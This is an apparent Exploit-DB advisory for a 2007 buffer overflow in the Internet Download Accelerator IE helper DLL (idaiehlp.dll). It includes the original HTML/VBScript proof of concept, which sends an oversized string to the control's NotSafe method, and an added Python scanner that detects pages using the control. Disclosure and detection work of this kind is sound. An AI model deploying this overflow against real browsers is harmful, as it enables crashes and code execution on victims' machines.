Vendor: Internet Download Accelerator
By: Dr.Pantagon
CVSS: 7.5 (HIGH)
CWE: Remote Buffer Overflow
Product Name: Internet Download Accelerator
Affected Version From: 4.x
Affected Version To: 6.x
Patch Exists: NO
Platforms Tested: Windows (Tested on Winados SP2)
Year: 2007

Internet Download Accelerator idaiehlp.dll Remote Buffer Overflow Vulnerability

This exploit targets a vulnerability in idaiehlp.dll, the Internet Explorer helper object (BHO) installed by Internet Download Accelerator. By passing a specially crafted, overly long string as the argument to the NotSafe method of the idaiehlp object, an attacker can trigger a buffer overflow and potentially execute arbitrary code on the target system.

Mitigation:

Upgrade to a newer version of Internet Download Accelerator or uninstall the software if not needed.

Exploit-DB raw data:

<!--========================== ==================================================
Internet Explorer ver 6.0 , 7.0
Tested On Winados SP2
DeltahackingSecurityTEAM
Bug discovered by Dr.Pantagon
Affected Software: idaiehlp.dll  (IE 4.x-6.x BHO for Internet Download Accelerator)
DLL VER : 1.9.1.74
program ver : 5.2
download link : http://download1.westbyte.com/ida/idasetup.exe
Company Dll : WestByte
site www. westbyte.com
www.Deltahacking.net
www.Deltasecurity.ir
==============================================================================-->
<html>
<object classid="clsid:2A646672-9C3A-4C28-9A7A-1FB0F63F28B6" id="idaiehlp"></object>
<script language='vbscript'>
arg1=String(999999, "A") + String(999999, unescape("%90"))
idaiehlp.NotSafe (arg1)
</script>

# milw0rm.com [2007-06-09]
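
For defenders, a page-content check that flags HTML instantiating this control, built from the CLSID and method name in the proof of concept above. It is an added example, not part of the original advisory: the function and finding names are hypothetical, the sample pages are constructed, and only `<object classid=...>` instantiation is covered.

```python
import re
from html.parser import HTMLParser

# CLSID of the idaiehlp.dll helper object, as given in the PoC on this page.
IDA_CLSID = "2a646672-9c3a-4c28-9a7a-1fb0f63f28b6"

class _ObjectFinder(HTMLParser):
    """Record every <object> element whose classid is the IDA control."""
    def __init__(self):
        super().__init__()
        self.count = 0   # matching <object> tags seen
        self.ids = []    # their id attributes (the names scripts call)

    def handle_starttag(self, tag, attrs):
        if tag != "object":
            return
        a = {k: (v or "") for k, v in attrs}
        value = a.get("classid", "").strip().lower()
        if value.startswith("clsid:"):
            value = value[len("clsid:"):]
        if value.strip("{} ") == IDA_CLSID:
            self.count += 1
            if a.get("id"):
                self.ids.append(a["id"])

def scan_page(html):
    """Return findings for one HTML document (hypothetical finding names)."""
    finder = _ObjectFinder()
    finder.feed(html)
    finder.close()
    findings = ["ida-control-instantiated"] if finder.count else []
    for oid in finder.ids:
        # VBScript is case-insensitive, so match <id>.NotSafe ignoring case.
        call = r"(?<![\w.])%s\s*\.\s*NotSafe\b" % re.escape(oid)
        if re.search(call, html, re.IGNORECASE):
            findings.append("notsafe-call:" + oid)
    return findings

# Constructed sample pages (short benign argument, no overflow string).
SAMPLE_HIT = ('<html><object CLASSID="CLSID:2A646672-9C3A-4C28-9A7A-1FB0F63F28B6"'
              ' id="helper"></object><script language="vbscript">'
              'helper.NotSafe ("x")</script></html>')
SAMPLE_CLEAN = ('<html><object classid="clsid:00000000-0000-0000-0000-000000000000"'
                ' id="helper"></object></html>')

if __name__ == "__main__":
    print(scan_page(SAMPLE_HIT))
    print(scan_page(SAMPLE_CLEAN))
```

Any page that instantiates the control is worth flagging on its own, since the control has no reason to be created by arbitrary web content; the NotSafe finding narrows it to the method named in this advisory.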